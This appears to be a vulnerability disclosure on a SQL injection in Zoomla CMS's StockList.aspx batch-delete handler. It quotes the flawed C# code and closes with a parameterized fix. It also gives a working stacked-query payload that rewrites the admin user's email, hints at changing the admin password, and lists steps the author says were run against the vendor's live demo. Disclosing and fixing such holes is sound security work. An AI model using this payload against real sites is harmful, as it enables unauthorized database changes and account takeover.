### Brief description:

The previous submission was ignored outright, so this time the test was done against the official demo. This hole has also existed since 2008.

### Detailed description:

This is an UPDATE-type injection. File: `/user/usershop/StockList.aspx`. Vulnerable parameter: `Item`. The affected code is as follows:

```csharp
protected void Button3_Click(object sender, EventArgs e)
{
    // "Item" carries the checkbox values of the rows selected for batch deletion.
    string text = base.Request.Form["Item"];
    if (!string.IsNullOrEmpty(text) && this.bll.delstock(text)) // <-- here: user input goes straight into SQL
    {
        base.Response.Write("<script language=javascript>alert('批量删除成功!');location.href='StockManage.aspx';</script>");
        return;
    }
    base.Response.Write("<script language=javascript>alert('批量删除失败!请选择您要删除的数据');location.href='StockManage.aspx';</script>");
}

public bool delstock(string str)
{
    // str is concatenated into the IN (...) list with no validation or parameterization.
    string strSql = "delete from ZL_UserStock where (id in (" + str + "))";
    return SqlHelper.ExecuteSql(strSql, null);
}
```

Crafted parameter:

```
0))update ZL_User set Email='wooyun' where username='admin'--
```

This changes the user's email; presumably the same spot could be changed to modify the administrator's password instead.

Steps: after logging in, visit http://demo.zoomla.cn/user/usershop/stocklist.aspx?Stocktype=1&a=aaa&id=111 and use Firebug to modify the page's `<table>` content.

Figure: [![Figure](https://images.seebug.org/upload/201405/14224518ec41affe7aecf9dd2118f73ffa244526.png)](https://images.seebug.org/upload/201405/14224518ec41affe7aecf9dd2118f73ffa244526.png)

The content is as follows:

```html
<table width="100%" border="0" cellspacing="0" cellpadding="0" style="margin: 0 auto;background-color: white;" class="border">
<tbody>
<tr align="center" style="background:#FFBD59">
  <td width="5%" class="title"><input type="checkbox" onclick="javascript:CheckAll(this);" name="Checkall" id="Checkall"></td>
  <td width="13%" class="title">单据类型</td>
  <td width="20%" class="title">单据编号</td>
  <td width="15%" class="title"> 录入时间</td>
  <td width="12%" class="title"> 录入者</td>
  <td width="20%" class="title"> 备注</td>
  <td width="15%" class="title"> 操作</td>
</tr>
<tr onmouseout="this.className='tdbg'" onmouseover="this.className='tdbgmouseover'" class="tdbg">
  <td height="22" align="center"><input type="checkbox" value="3" name="Item"></td>
  <td height="22" align="center">出库</td>
  <td height="22" align="center">订单</td>
  <td height="22" align="center">2014/5/14 21:54:09</td>
  <td height="22" align="center">admin</td>
  <td height="22" align="center">好家伙</td>
  <td height="22" align="center"><a href="StockAdd.aspx?menu=edit&id=3">修改</a> <a onclick="return confirm('不可恢复性删除数据,你确定将该数据删除吗?');" href="Stocklist.aspx?menu=del&id=3">删除</a></td>
</tr>
<tr onmouseout="this.className='tdbg'" onmouseover="this.className='tdbgmouseover'" class="tdbg">
  <td height="22" align="center"><input type="checkbox" value="2" name="Item"></td>
  <td height="22" align="center">出库</td>
  <td height="22" align="center">订单</td>
  <td height="22" align="center">2014/5/14 21:54:09</td>
  <td height="22" align="center">admin</td>
  <td height="22" align="center">好家伙</td>
  <td height="22" align="center"><a href="StockAdd.aspx?menu=edit&id=2">修改</a> <a onclick="return confirm('不可恢复性删除数据,你确定将该数据删除吗?');" href="Stocklist.aspx?menu=del&id=2">删除</a></td>
</tr>
<tr class="tdbg">
  <td height="22" align="center" class="tdbgleft" colspan="10">共 <span id="Allnum">2</span> 条记录
    <span id="Toppage"><a href="?Stocktype=0&Currentpage=0">首页</a></span>
    <span class="aspNetDisabled" id="Nextpage"><a href="?Stocktype=0&Currentpage=0">上一页</a></span>
    <span class="aspNetDisabled" id="Downpage"><a href="?Stocktype=0&Currentpage=1">下一页</a></span>
    <span id="Endpage"><a href="?Stocktype=0&Currentpage=1">尾页</a></span>
    页次:<span id="Nowpage">1</span>/<span id="PageSize">1</span>页 <span id="pagess">10</span>条记录/页
    转到第<select id="DropDownList1" onchange="javascript:setTimeout('__doPostBack(\'DropDownList1\',\'\')', 0)" name="DropDownList1">
      <option value="1">1</option>
    </select>页</td>
</tr>
</tbody>
</table>
```

Change the value of the checkbox:

[![Value.png](https://images.seebug.org/upload/201405/1422502911f9322c7c7dfc6b7ecf9784c34f7ca6.png)](https://images.seebug.org/upload/201405/1422502911f9322c7c7dfc6b7ecf9784c34f7ca6.png)

Then click the delete button.

### Proof of vulnerability:

[![Figure](https://images.seebug.org/upload/201405/14224711388b572bb4b9879b1aff8ff035e1edf2.png)](https://images.seebug.org/upload/201405/14224711388b572bb4b9879b1aff8ff035e1edf2.png)

The locally downloaded CMS2 V1.3, V1.4 and V1.5, as well as CMS6.0, are all affected. Also, judging by the earliest file, this hole has existed since 2008.
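The root cause is that `delstock` splices the `Item` string into the `IN (...)` list, so `0))` closes both open parentheses and `--` discards the rest, leaving a stacked `update` statement. A hardened replacement, written here as an added example and not Zoomla's own code, parses the list into integers and binds each id as a `SqlParameter`; it assumes `System.Data.SqlClient` and an already-open `SqlConnection`, with the `ZL_UserStock` table and `id` column taken from the page.

```csharp
// Added example (not Zoomla's code): a hardened replacement for delstock() above. Assumes
// System.Data.SqlClient and an open SqlConnection; ZL_UserStock/id are the page's names.
using System.Collections.Generic;
using System.Data.SqlClient;

public static class StockRepository
{
    // Parse the comma-separated checkbox values (ASP.NET joins same-name fields with ',')
    // into integers. Returns null if any piece is not a positive integer, so the page's
    // payload ("0))update ZL_User ...--") is rejected before any SQL is built.
    public static List<int> ParseIds(string item)
    {
        if (string.IsNullOrWhiteSpace(item)) return null;
        var ids = new List<int>();
        foreach (string part in item.Split(','))
        {
            int id;
            if (!int.TryParse(part.Trim(), out id) || id <= 0) return null;
            ids.Add(id);
        }
        return ids;
    }

    // Build "DELETE ... WHERE id IN (@p0, @p1, ...)" with one SqlParameter per id,
    // so the values travel as data and never become part of the SQL text.
    public static SqlCommand BuildDeleteCommand(SqlConnection conn, List<int> ids)
    {
        var cmd = new SqlCommand { Connection = conn };
        var names = new List<string>();
        for (int i = 0; i < ids.Count; i++)
        {
            string name = "@p" + i;
            names.Add(name);
            cmd.Parameters.AddWithValue(name, ids[i]);
        }
        cmd.CommandText = "DELETE FROM ZL_UserStock WHERE id IN (" + string.Join(", ", names) + ")";
        return cmd;
    }

    // Drop-in replacement for delstock(): validate first, then run the parameterized delete.
    public static bool DelStock(SqlConnection conn, string item)
    {
        List<int> ids = ParseIds(item);
        if (ids == null) return false;
        using (SqlCommand cmd = BuildDeleteCommand(conn, ids))
        {
            return cmd.ExecuteNonQuery() > 0;
        }
    }
}
```

A rejected `Item` value (the `ParseIds` null path) is also a good point to log the request, since a non-numeric id list from this form is a direct injection indicator.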